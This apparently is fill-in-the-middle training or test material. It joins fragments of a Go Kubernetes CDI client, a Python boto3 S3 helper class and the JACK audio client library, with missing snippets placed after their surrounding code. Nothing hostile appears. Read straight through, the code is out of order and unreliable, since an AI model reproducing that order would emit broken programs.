Do(ctx).
Error()
}
// DeleteCollection deletes a collection of objects.
func (c *cDIs) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
var timeout time.Duration
if listOpts.TimeoutSeconds != nil {
timeout = time.Duration(*listOpts.TimeoutSeconds) * time.Second
}
return c.client.Delete().
Resource("cdis").
VersionedParams(&listOpts, scheme.ParameterCodec).
Timeout(timeout).
Body(&opts).
Do(ctx).
Error()
}
// Patch applies the patch and returns the patched cDI.
func (c *cDIs) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Patch(pt).
Resource("cdis").
Name(name).
SubResource(subresources...).
VersionedParams(&opts, scheme.ParameterCodec).
Body(data).
Do(ctx).
Into(result)
return
}
| {
return &cDIs{
client: c.RESTClient(),
}
} |
s3_operations.py |
import os
import boto3
import typeguard
from botocore.exceptions import ClientError
from os import listdir
from os.path import isfile, join
from benchmark_runner.common.clouds.shared.s3.s3_operations_exceptions import S3FileNotUploaded, S3FileNotDownloaded, S3FileNotDeleted, S3KeyNotCreated, S3FileNotExist, S3FailedCreatePresingedURL
from benchmark_runner.main.environment_variables import environment_variables
class S3Operations:
""" This class is responsible for S3 operations """
def __init__(self, region_name: str = '', endpoint_url: str = None, aws_access_key_id: str = None, aws_secret_access_key: str = None):
# environment variables
self.__environment_variables_dict = environment_variables.environment_variables_dict
# must add region for pytest
if region_name:
self.__region = region_name
self.__endpoint_url = endpoint_url
self.__aws_access_key_id = aws_access_key_id
self.__aws_secret_access_key = aws_secret_access_key
else:
self.__region = self.__environment_variables_dict.get('region_name', '')
# must be None for pytest
self.__endpoint_url = self.__environment_variables_dict.get('endpoint_url', None)
self.__aws_access_key_id = self.__environment_variables_dict.get('access_key_id', '')
self.__aws_secret_access_key = self.__environment_variables_dict.get('secret_access_key', '')
self.__s3_client = boto3.client(service_name='s3',
region_name=self.__region,
endpoint_url=self.__endpoint_url,
aws_access_key_id=self.__aws_access_key_id,
aws_secret_access_key=self.__aws_secret_access_key)
@typeguard.typechecked
def upload_file(self, file_name_path: str, bucket: str, key: str, upload_file: str):
"""
        This method uploads a file to S3
:param file_name_path:'/home/user/test.txt'
:param bucket:'benchmark'
:param key:'test-data'
:param upload_file:'test.txt'
:return:
"""
try:
self.__s3_client.upload_file(Filename=file_name_path,
Bucket=bucket,
Key=f'{key}/{upload_file}',
ExtraArgs={'ServerSideEncryption': 'AES256'})
except ClientError:
raise
except Exception:
raise S3FileNotUploaded
@typeguard.typechecked
def download_file(self, bucket: str, key: str, download_file: str, file_name_path: str):
"""
        This method downloads a file from S3
:param bucket:'benchmark'
:param key:'logs/ec2-idle/2021/01/19/18'
:param download_file: 'test.txt'
:param file_name_path:'D:\\Performance\\Projects\\py-image-service\\data\\rt_results\\test.txt'
:return:
"""
try:
if download_file:
self.__s3_client.download_file(Bucket=bucket, Key=f'{key}/{download_file}', Filename=file_name_path)
else:
self.__s3_client.download_file(Bucket=bucket, Key=key, Filename=file_name_path)
except ClientError:
raise
except Exception:
raise S3FileNotDownloaded
@typeguard.typechecked
def delete_file(self, bucket: str, key: str, file_name: str):
"""
        This method deletes a file from S3
:param bucket:'benchmark'
:param key:'test-data'
:param file_name: 'test.txt'
:return:
"""
try:
self.__s3_client.delete_object(Bucket=bucket, Key=f'{key}/{file_name}')
except ClientError:
raise
except Exception:
raise S3FileNotDeleted
@typeguard.typechecked
def delete_folder(self, bucket: str, key: str):
"""
        This method deletes a folder from S3
:param bucket:'benchmark'
:param key:'framework/test'
:return:
"""
try:
objects_to_delete = self.__s3_client.list_objects(Bucket=bucket, Prefix=key)
delete_keys = {
'Objects': [{'Key': k} for k in [obj['Key'] for obj in objects_to_delete.get('Contents', [])]]}
if delete_keys['Objects']:
self.__s3_client.delete_objects(Bucket=bucket, Delete=delete_keys)
except ClientError:
raise
except Exception:
raise S3FileNotDeleted
@typeguard.typechecked
def create_folder(self, bucket: str, key: str):
"""
        This method creates an empty key (folder) in S3
:param bucket:'benchmark'
:param key:'framework/test'
:return:
"""
try:
self.__s3_client.put_object(Bucket=bucket, Key=key)
except ClientError:
raise
except Exception:
raise S3KeyNotCreated
@typeguard.typechecked
def file_exist(self, bucket: str, key: str, file_name: str):
"""
        This method checks whether a file exists in S3
:param bucket:'benchmark'
:param key:'framework/test'
:param file_name:'file.txt'
:return:
"""
try:
response = self.__s3_client.list_objects_v2(Bucket=bucket, Prefix=key)
if response.get('Contents'):
for item in response['Contents']:
if file_name in item['Key']:
return True
return False
# Todo add custom error
except ClientError:
raise
except Exception:
raise S3FileNotExist
@typeguard.typechecked
def upload_objects(self, local_source: str, s3_target: str):
"""
        This method uploads a local data folder to an S3 target path
:param local_source: local data folder i.e. '/home/user/'
:param s3_target: target s3 path i.e. 'data_store/calc_image_data/'
:return:
"""
try:
if '/' in s3_target:
targets = s3_target.split('/')
bucket = targets[0]
key = '/'.join(targets[1:])
else:
bucket = s3_target
key = ''
files = [f for f in listdir(local_source) if isfile(join(local_source, f))]
for file in files:
filename = os.path.join(local_source, file)
self.upload_file(file_name_path=filename, bucket=bucket, key=key, upload_file=file)
except ClientError as err:
raise
except Exception:
raise S3FileNotUploaded
@typeguard.typechecked
def download_objects(self, s3_target: str, local_source: str):
"""
        This method downloads from an S3 target to a local data folder
        :param local_source: local data folder i.e. '/home/user/'
:param s3_target: target s3 path i.e. 'data_store/calc_image_data/'
:return:
"""
files = []
try:
if '/' in s3_target:
targets = s3_target.split('/')
bucket = targets[0]
key = '/'.join(targets[1:])
else:
bucket = s3_target
key = ''
response = self.__s3_client.list_objects_v2(Bucket=bucket, Prefix=key)
if response.get('Contents'):
for item in response['Contents']:
if item['Key'].split('/')[-1]:
files.append(item['Key'].split('/')[-1])
else:
|
for file in files:
file_name = os.path.join(local_source, file)
self.download_file(bucket=bucket, key=key, download_file=file, file_name_path=file_name)
except ClientError as err:
raise
except Exception:
raise S3FileNotDownloaded
@typeguard.typechecked
def generate_presigned_url(self, bucket: str, key: str, file_name: str):
"""
        This method generates a presigned URL for a specific uploaded object (valid for 7 days by default)
:param bucket:'benchmark'
:param key:'logs/test-data'
:param file_name:'file.txt'
:return:
"""
try:
return self.__s3_client.generate_presigned_url('get_object',
Params={'Bucket': bucket, 'Key': f'{key}/{file_name}'},
ExpiresIn=604800)
# Todo add custom error
except ClientError:
raise
except Exception:
raise S3FailedCreatePresingedURL
| files.append(item['Key']) |
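# Hedged usage sketch (not part of the module above): one way to drive
# S3Operations end-to-end. The bucket, key, and file names are illustrative
# placeholders, and valid AWS credentials are assumed to be available.
if __name__ == '__main__':
    s3 = S3Operations(region_name='us-east-1')
    s3.upload_file(file_name_path='/tmp/test.txt', bucket='benchmark',
                   key='test-data', upload_file='test.txt')
    if s3.file_exist(bucket='benchmark', key='test-data', file_name='test.txt'):
        print(s3.generate_presigned_url(bucket='benchmark', key='test-data',
                                        file_name='test.txt'))
    s3.delete_file(bucket='benchmark', key='test-data', file_name='test.txt')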
jack.py | # Copyright (c) 2014-2015 Matthias Geier
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""JACK Client for Python.
http://jackclient-python.readthedocs.io/
"""
__version__ = '0.4.3'
from ctypes.util import find_library as _find_library
import errno as _errno
import platform as _platform
import warnings as _warnings
from _jack import ffi as _ffi
if _platform.system() == 'Windows':
if _platform.architecture()[0] == '64bit':
_libname = _find_library('libjack64')
else:
_libname = _find_library('libjack')
else:
_libname = _find_library('jack')
if _libname is None:
raise OSError('JACK library not found')
_lib = _ffi.dlopen(_libname)
_AUDIO = b'32 bit float mono audio'
_MIDI = b'8 bit raw midi'
STOPPED = _lib.JackTransportStopped
"""Transport halted."""
ROLLING = _lib.JackTransportRolling
"""Transport playing."""
STARTING = _lib.JackTransportStarting
"""Waiting for sync ready."""
NETSTARTING = _lib.JackTransportNetStarting
"""Waiting for sync ready on the network."""
_SUCCESS = 0
_FAILURE = 1
class Client(object):
"""A client that can connect to the JACK audio server."""
def __init__(self, name, use_exact_name=False, no_start_server=False,
servername=None, session_id=None):
"""Create a new JACK client.
A client object is a *context manager*, i.e. it can be used in a
*with statement* to automatically call `activate()` in the
beginning of the statement and `deactivate()` and `close()` on
exit.
Parameters
----------
name : str
The desired client name of at most `client_name_size()`
characters. The name scope is local to each server.
Unless forbidden by the *use_exact_name* option, the server
will modify this name to create a unique variant, if needed.
Other Parameters
----------------
use_exact_name : bool
Whether an error should be raised if *name* is not unique.
See `Status.name_not_unique`.
no_start_server : bool
Do not automatically start the JACK server when it is not
already running. This option is always selected if
``JACK_NO_START_SERVER`` is defined in the calling process
environment.
servername : str
Selects from among several possible concurrent server
instances.
Server names are unique to each user. If unspecified, use
``'default'`` unless ``JACK_DEFAULT_SERVER`` is defined in
the process environment.
session_id : str
Pass a SessionID Token. This allows the sessionmanager to
identify the client again.
"""
status = _ffi.new('jack_status_t*')
options = _lib.JackNullOption
optargs = []
if use_exact_name:
options |= _lib.JackUseExactName
if no_start_server:
options |= _lib.JackNoStartServer
if servername:
options |= _lib.JackServerName
optargs.append(_ffi.new('char[]', servername.encode()))
if session_id:
options |= _lib.JackSessionID
optargs.append(_ffi.new('char[]', session_id.encode()))
self._ptr = _lib.jack_client_open(name.encode(), options, status,
*optargs)
self._status = Status(status[0])
if not self._ptr:
raise JackError('Error initializing "{0}": {1}'.format(
name, self.status))
self._inports = Ports(self, _AUDIO, _lib.JackPortIsInput)
self._outports = Ports(self, _AUDIO, _lib.JackPortIsOutput)
self._midi_inports = Ports(self, _MIDI, _lib.JackPortIsInput)
self._midi_outports = Ports(self, _MIDI, _lib.JackPortIsOutput)
self._keepalive = []
self._position = _ffi.new('jack_position_t*')
# Avoid confusion if something goes wrong before opening the client:
_ptr = _ffi.NULL
def __enter__(self):
self.activate()
return self
def __exit__(self, *args):
self.deactivate()
self.close()
def __del__(self):
"""Close JACK client on garbage collection."""
self.close()
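    # Hedged usage sketch (not part of the upstream docs): because of
    # __enter__/__exit__ above, a client is typically used as
    #
    #     with Client('example-client') as client:
    #         print(client.samplerate)
    #
    # which calls activate() on entry and deactivate()/close() on exit.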
@property
def name(self):
"""The name of the JACK client (read-only)."""
return _ffi.string(_lib.jack_get_client_name(self._ptr)).decode()
@property
def samplerate(self):
"""The sample rate of the JACK system (read-only)."""
return _lib.jack_get_sample_rate(self._ptr)
@property
def blocksize(self):
"""The JACK block size (must be a power of two).
The current maximum size that will ever be passed to the process
callback. It should only be queried *before* `activate()` has
been called. This size may change, clients that depend on it
must register a callback with `set_blocksize_callback()` so they
will be notified if it does.
Changing the blocksize stops the JACK engine process cycle, then
calls all registered callback functions (see
`set_blocksize_callback()`) before restarting the process
cycle. This will cause a gap in the audio flow, so it should
only be done at appropriate stopping points.
"""
return _lib.jack_get_buffer_size(self._ptr)
@blocksize.setter
def blocksize(self, blocksize):
_check(_lib.jack_set_buffer_size(self._ptr, blocksize),
'Error setting JACK blocksize')
@property
def status(self):
"""JACK client status. See `Status`."""
return self._status
@property
def realtime(self):
"""Whether JACK is running with ``-R`` (``--realtime``)."""
return bool(_lib.jack_is_realtime(self._ptr))
@property
def frames_since_cycle_start(self):
"""Time since start of audio block.
The estimated time in frames that has passed since the JACK
server began the current process cycle.
"""
return _lib.jack_frames_since_cycle_start(self._ptr)
@property
def frame_time(self):
"""The estimated current time in frames.
This is intended for use in other threads (not the process
callback). The return value can be compared with the value of
`last_frame_time` to relate time in other threads to JACK time.
"""
return _lib.jack_frame_time(self._ptr)
@property
def last_frame_time(self):
"""The precise time at the start of the current process cycle.
This may only be used from the process callback (see
`set_process_callback()`), and can be used to interpret
timestamps generated by `frame_time` in other threads with
respect to the current process cycle.
This is the only jack time function that returns exact time:
when used during the process callback it always returns the same
value (until the next process callback, where it will return
that value + `blocksize`, etc). The return value is guaranteed
to be monotonic and linear in this fashion unless an xrun occurs
(see `set_xrun_callback()`). If an xrun occurs, clients must
check this value again, as time may have advanced in a
non-linear way (e.g. cycles may have been skipped).
"""
return _lib.jack_last_frame_time(self._ptr)
@property
def inports(self):
"""A list of audio input `Ports`.
New ports can be created and added to this list with
`inports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`inports.clear() <Ports.clear>` can be used to unregister all
audio input ports at once.
See Also
--------
Ports, OwnPort
"""
return self._inports
@property
def outports(self):
"""A list of audio output :class:`Ports`.
New ports can be created and added to this list with
`outports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`outports.clear() <Ports.clear>` can be used to unregister all
audio output ports at once.
See Also
--------
Ports, OwnPort
"""
return self._outports
@property
def midi_inports(self):
"""A list of MIDI input :class:`Ports`.
New MIDI ports can be created and added to this list with
`midi_inports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`midi_inports.clear() <Ports.clear>` can be used to unregister
all MIDI input ports at once.
See Also
--------
Ports, OwnMidiPort
"""
return self._midi_inports
@property
def midi_outports(self):
"""A list of MIDI output :class:`Ports`.
New MIDI ports can be created and added to this list with
`midi_outports.register() <Ports.register>`.
When :meth:`~OwnPort.unregister` is called on one of the items
in this list, this port is removed from the list.
`midi_outports.clear() <Ports.clear>` can be used to unregister
all MIDI output ports at once.
See Also
--------
Ports, OwnMidiPort
"""
return self._midi_outports
def owns(self, port):
"""Check if a given port belongs to *self*.
Parameters
----------
port : str or Port
Full port name or `Port`, `MidiPort`, `OwnPort` or
`OwnMidiPort` object.
"""
port = self._get_port_ptr(port)
return bool(_lib.jack_port_is_mine(self._ptr, port))
def activate(self):
"""Activate JACK client.
Tell the JACK server that the program is ready to start
processing audio.
"""
_check(_lib.jack_activate(self._ptr), 'Error activating JACK client')
def deactivate(self, ignore_errors=True):
"""De-activate JACK client.
Tell the JACK server to remove *self* from the process graph.
Also, disconnect all ports belonging to it, since inactive
clients have no port connections.
"""
err = _lib.jack_deactivate(self._ptr)
if not ignore_errors:
_check(err, 'Error deactivating JACK client')
def cpu_load(self):
"""Return the current CPU load estimated by JACK.
This is a running average of the time it takes to execute a full
process cycle for all clients as a percentage of the real time
available per cycle determined by `blocksize` and `samplerate`.
"""
return _lib.jack_cpu_load(self._ptr)
def close(self, ignore_errors=True):
"""Close the JACK client."""
if self._ptr: |
def connect(self, source, destination):
"""Establish a connection between two ports.
When a connection exists, data written to the source port will
be available to be read at the destination port.
Audio ports cannot be connected to MIDI ports.
Parameters
----------
source : str or Port
One end of the connection. Must be an output port.
destination : str or Port
The other end of the connection. Must be an input port.
See Also
--------
OwnPort.connect, disconnect
"""
if isinstance(source, Port):
source = source.name
if isinstance(destination, Port):
destination = destination.name
err = _lib.jack_connect(self._ptr, source.encode(),
destination.encode())
if err == _errno.EEXIST:
raise JackError('Connection {0!r} -> {1!r} '
'already exists'.format(source, destination))
_check(err,
'Error connecting {0!r} -> {1!r}'.format(source, destination))
def disconnect(self, source, destination):
"""Remove a connection between two ports.
Parameters
----------
source, destination : str or Port
See `connect()`.
"""
if isinstance(source, Port):
source = source.name
if isinstance(destination, Port):
destination = destination.name
_check(_lib.jack_disconnect(
self._ptr, source.encode(), destination.encode()),
"Couldn't disconnect {0!r} -> {1!r}".format(source, destination))
def transport_start(self):
"""Start JACK transport."""
_lib.jack_transport_start(self._ptr)
def transport_stop(self):
"""Stop JACK transport."""
_lib.jack_transport_stop(self._ptr)
@property
def transport_state(self):
"""JACK transport state.
This is one of `STOPPED`, `ROLLING`, `STARTING`, `NETSTARTING`.
See Also
--------
transport_query
"""
return TransportState(_lib.jack_transport_query(self._ptr, _ffi.NULL))
@property
def transport_frame(self):
"""Get/set current JACK transport frame.
Return an estimate of the current transport frame, including any
time elapsed since the last transport positional update.
Assigning a frame number repositions the JACK transport.
"""
return _lib.jack_get_current_transport_frame(self._ptr)
@transport_frame.setter
def transport_frame(self, frame):
_check(_lib.jack_transport_locate(self._ptr, frame),
'Error locating JACK transport')
def transport_locate(self, frame):
"""
.. deprecated:: 0.4.1
Use `transport_frame` instead
"""
_warnings.warn(
'transport_locate() is deprecated, use transport_frame',
DeprecationWarning)
self.transport_frame = frame
def transport_query(self):
"""Query the current transport state and position.
This is a convenience function that does the same as
`transport_query_struct()`, but it only returns the valid fields
in an easy-to-use ``dict``.
Returns
-------
state : TransportState
The transport state can take following values:
`STOPPED`, `ROLLING`, `STARTING` and `NETSTARTING`.
position : dict
A dictionary containing only the valid fields of the
structure returned by `transport_query_struct()`.
See Also
--------
:attr:`transport_state`, transport_query_struct
"""
state, pos = self.transport_query_struct()
return TransportState(state), position2dict(pos)
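# --- Example (hedged): driving and querying the JACK transport ---
# A minimal sketch, assuming a running JACK server.  `transport_query()`
# returns a (TransportState, dict) pair as documented above.
import jack

client = jack.Client('transport_example')
client.transport_frame = 0                 # reposition to the start
client.transport_start()
state, pos = client.transport_query()
print(state, pos['frame'], pos['frame_rate'])
client.transport_stop()
client.close()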
def transport_query_struct(self):
"""Query the current transport state and position.
This function is realtime-safe, and can be called from any
thread. If called from the process thread, the returned
position corresponds to the first frame of the current cycle and
the state returned is valid for the entire cycle.
Returns
-------
state : int
The transport state can take following values: `STOPPED`,
`ROLLING`, `STARTING` and `NETSTARTING`.
position : jack_position_t
See the `JACK transport documentation`__ for the available
fields.
__ http://jackaudio.org/files/docs/html/
structjack__position__t.html
See Also
--------
transport_query, transport_reposition_struct
"""
state = _lib.jack_transport_query(self._ptr, self._position)
return state, self._position
def transport_reposition_struct(self, position):
"""Request a new transport position.
May be called at any time by any client. The new position takes
effect in two process cycles. If there are slow-sync clients
and the transport is already rolling, it will enter the
`STARTING` state and begin invoking their sync callbacks
(see `jack_set_sync_callback()`__) until ready.
This function is realtime-safe.
__ http://jackaudio.org/files/docs/html/group__TransportControl.html
Parameters
----------
position : jack_position_t
Requested new transport position. This is the same
structure as returned by `transport_query_struct()`.
See Also
--------
transport_query_struct, transport_locate
"""
_check(_lib.jack_transport_reposition(self._ptr, position),
'Error re-positioning transport')
def set_freewheel(self, onoff):
"""Start/Stop JACK's "freewheel" mode.
When in "freewheel" mode, JACK no longer waits for any external
event to begin the start of the next process cycle.
As a result, freewheel mode causes "faster than realtime"
execution of a JACK graph. If the client holds real-time
scheduling, it is dropped when entering freewheel mode and, if
appropriate, reacquired when stopping.
IMPORTANT: on systems using capabilities to provide real-time
scheduling (i.e. Linux kernel 2.4), if onoff is zero, this
function must be called from the thread that originally called
`activate()`. This restriction does not apply to other systems
(e.g. Linux kernel 2.6 or OS X).
Parameters
----------
onoff : bool
If ``True``, freewheel mode starts. Otherwise freewheel mode
ends.
See Also
--------
set_freewheel_callback
"""
_check(_lib.jack_set_freewheel(self._ptr, onoff),
'Error setting freewheel mode')
def set_shutdown_callback(self, callback):
"""Register shutdown callback.
Register a function (and optional argument) to be called if and
when the JACK server shuts down the client thread.
The function must be written as if it were an asynchronous POSIX
signal handler -- use only async-safe functions, and remember
that it is executed from another thread.
A typical function might set a flag or write to a pipe so that
the rest of the application knows that the JACK client thread
has shut down.
.. note:: Clients do not need to call this. It exists only to
help more complex clients understand what is going on. It
should be called before `activate()`.
Parameters
----------
callback : callable
User-supplied function that is called whenever the JACK
daemon is shut down. It must have this signature::
callback(status: Status, reason: str) -> None
The argument *status* is of type `jack.Status`.
.. note:: The *callback* should typically signal another
thread to correctly finish cleanup by calling `close()`
(since it cannot be called directly in the context of the
thread that calls the shutdown callback).
After server shutdown, the client is *not* deallocated by
JACK; the user (that's you!) is responsible for properly
calling `close()` to release client resources.
Alternatively, the `Client` object can be used as a
*context manager* in a *with statement*, which takes care
of activating, deactivating and closing the client
automatically.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackInfoShutdownCallback')
def callback_wrapper(code, reason, _):
callback(Status(code), _ffi.string(reason).decode())
_lib.jack_on_info_shutdown(self._ptr, callback_wrapper, _ffi.NULL)
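# --- Example (hedged): a shutdown callback that signals the main thread ---
# Following the note above, the callback only sets a flag; the main thread
# then calls close().  Client name and structure are illustrative only.
import threading
import jack

shutdown_event = threading.Event()
client = jack.Client('shutdown_example')

def on_shutdown(status, reason):
    print('JACK shutdown:', reason, status)
    shutdown_event.set()

client.set_shutdown_callback(on_shutdown)  # must happen before activate()
client.activate()
try:
    shutdown_event.wait()                  # blocks until the server goes away
finally:
    client.close()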
def set_process_callback(self, callback):
"""Register process callback.
Tell the JACK server to call *callback* whenever there is work
to be done.
The code in the supplied function must be suitable for real-time
execution. That means that it cannot call functions that might
block for a long time. This includes malloc, free, printf,
pthread_mutex_lock, sleep, wait, poll, select, pthread_join,
pthread_cond_wait, etc, etc.
.. warning:: Most Python interpreters use a `global interpreter
lock (GIL)`__, which violates the above real-time
requirement. Furthermore, Python's `garbage collector`__
might become active at an inconvenient time and block the
process callback for some time.
Because of this, Python is not really suitable for real-time
processing. If you want to implement a *reliable* real-time
audio/MIDI application, you should use a different
programming language, such as C or C++.
If you can live with some random audio drop-outs now and
then, feel free to continue using Python!
__ https://en.wikipedia.org/wiki/Global_Interpreter_Lock
__ https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called by the engine anytime
there is work to be done. It must have this signature::
callback(frames: int) -> None
The argument *frames* specifies the number of frames that
have to be processed in the current audio block.
It will be the same number as `blocksize` and it will be a
power of two.
As long as the client is active, the *callback* will be
called once in each process cycle. However, if an exception
is raised inside of a *callback*, it will not be called
anymore. The exception `CallbackExit` can be used to
silently prevent further callback invocations, all other
exceptions will print an error message to *stderr*.
"""
@self._callback('JackProcessCallback', error=_FAILURE)
def callback_wrapper(frames, _):
try:
callback(frames)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_process_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting process callback')
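# --- Example (hedged): a pass-through process callback ---
# Copies each input buffer to the corresponding output buffer, raw bytes via
# get_buffer().  Sketch only; assumes a running server and paired ports.
import jack

client = jack.Client('thru_example')
client.inports.register('in_1')
client.outports.register('out_1')

@client.set_process_callback
def process(frames):
    for src, dst in zip(client.inports, client.outports):
        dst.get_buffer()[:] = src.get_buffer()

with client:                 # context manager activates, deactivates, closes
    input('press Return to quit\n')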
def set_freewheel_callback(self, callback):
"""Register freewheel callback.
Tell the JACK server to call *callback* whenever we enter or
leave "freewheel" mode.
The argument to the callback will be ``True`` if JACK is
entering freewheel mode, and ``False`` otherwise.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever JACK starts
or stops freewheeling. It must have this signature::
callback(starting: bool) -> None
The argument *starting* is ``True`` if we start to
freewheel, ``False`` otherwise.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
set_freewheel
"""
@self._callback('JackFreewheelCallback')
def callback_wrapper(starting, _):
callback(bool(starting))
_check(_lib.jack_set_freewheel_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting freewheel callback')
def set_blocksize_callback(self, callback):
"""Register blocksize callback.
Tell JACK to call *callback* whenever the size of the buffer
that will be passed to the process callback is about to change.
Clients that depend on knowing the buffer size must supply a
*callback* before activating themselves.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is invoked whenever the JACK
engine buffer size changes. It must have this signature::
callback(blocksize: int) -> None
The argument *blocksize* is the new buffer size.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Although this function is called in the JACK
process thread, the normal process cycle is suspended
during its operation, causing a gap in the audio flow.
So, the *callback* can allocate storage, touch memory not
previously referenced, and perform other operations that
are not realtime safe.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
:attr:`blocksize`
"""
@self._callback('JackBufferSizeCallback', error=_FAILURE)
def callback_wrapper(blocksize, _):
try:
callback(blocksize)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_buffer_size_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting blocksize callback')
def set_samplerate_callback(self, callback):
"""Register samplerate callback.
Tell the JACK server to call *callback* whenever the system
sample rate changes.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called when the engine sample
rate changes. It must have this signature::
callback(samplerate: int) -> None
The argument *samplerate* is the new engine sample rate.
The *callback* is supposed to raise `CallbackExit` on error.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
See Also
--------
:attr:`samplerate`
"""
@self._callback('JackSampleRateCallback', error=_FAILURE)
def callback_wrapper(samplerate, _):
try:
callback(samplerate)
except CallbackExit:
return _FAILURE
return _SUCCESS
_check(_lib.jack_set_sample_rate_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting samplerate callback')
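# --- Example (hedged): reacting to blocksize and samplerate changes ---
# Sketch: both callbacks must be registered before activate(); printing here
# is fine because notification callbacks run in a non-realtime thread.
import jack

client = jack.Client('notify_example')

def on_blocksize(blocksize):
    print('new blocksize:', blocksize)

def on_samplerate(samplerate):
    print('new samplerate:', samplerate)

client.set_blocksize_callback(on_blocksize)
client.set_samplerate_callback(on_samplerate)
client.activate()
# ... later: client.deactivate(); client.close()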
def set_client_registration_callback(self, callback):
"""Register client registration callback.
Tell the JACK server to call *callback* whenever a client is
registered or unregistered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
Parameters
----------
callback : callable
User-supplied function that is called whenever a client is
registered or unregistered. It must have this signature::
callback(name: str, register: bool) -> None
The first argument contains the client name, the second
argument is ``True`` if the client is being registered and
``False`` if the client is being unregistered.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
"""
@self._callback('JackClientRegistrationCallback')
def callback_wrapper(name, register, _):
callback(_ffi.string(name).decode(), bool(register))
_check(_lib.jack_set_client_registration_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting client registration callback')
def set_port_registration_callback(self, callback=None,
only_available=True):
"""Register port registration callback.
Tell the JACK server to call *callback* whenever a port is
registered or unregistered.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
.. note:: Due to JACK 1 behavior, it is not possible to get
the pointer to an unregistering JACK Port if it already
existed before `activate()` was called. This will cause
the callback not to be called if *only_available* is
``True``, or called with ``None`` as first argument (see
below).
To avoid this, call `Client.get_ports()` just after
`activate()`, allowing the module to store pointers to
already existing ports and always receive a `Port`
argument for this callback.
Parameters
----------
callback : callable
User-supplied function that is called whenever a port is
registered or unregistered. It must have this signature::
callback(port: Port, register: bool) -> None
The first argument is a `Port`, `MidiPort`, `OwnPort` or
`OwnMidiPort` object, the second argument is ``True`` if the
port is being registered, ``False`` if the port is being
unregistered.
.. note:: Same as with most callbacks, no functions that
interact with the JACK daemon should be used here.
only_available : bool, optional
If ``True``, the *callback* is not called if the port in
question is not available anymore (after another JACK client
has unregistered it).
If ``False``, it is called nonetheless, but the first
argument of the *callback* will be ``None`` if the port is
not available anymore.
See Also
--------
Ports.register
"""
if callback is None:
return lambda cb: self.set_port_registration_callback(
cb, only_available)
@self._callback('JackPortRegistrationCallback')
def callback_wrapper(port_id, register, _):
port_ptr = _lib.jack_port_by_id(self._ptr, port_id)
if port_ptr:
port = self._wrap_port_ptr(port_ptr)
elif only_available:
return
else:
port = None
callback(port, bool(register))
_check(_lib.jack_set_port_registration_callback(
self._ptr, callback_wrapper, _ffi.NULL),
'Error setting port registration callback')
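# --- Example (hedged): watching port registrations ---
# Sketch using the method as a decorator (possible because *callback* may be
# omitted).  Per the note above, get_ports() is called right after activate()
# so pointers to pre-existing ports are known to the module.
import jack

client = jack.Client('registration_example')

@client.set_port_registration_callback
def on_port(port, register):
    print('port', port, 'registered' if register else 'unregistered')

client.activate()
client.get_ports()
# ... later: client.deactivate(); client.close()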
def set_port_connect_callback(self, callback=None, only_available=True):
"""Register port connect callback.
Tell the JACK server to call *callback* whenever a port is
connected or disconnected.
All "notification events" are received in a separated non RT
thread, the code in the supplied function does not need to be
suitable for real-time execution.
.. note:: This function cannot be called while the client is
activated (after `activate()` has been called).
.. note:: Due to JACK 1 behavior, it is not possible to get
the pointer to an unregistering JACK Port if it already
existed before `activate()` was called. This will cause
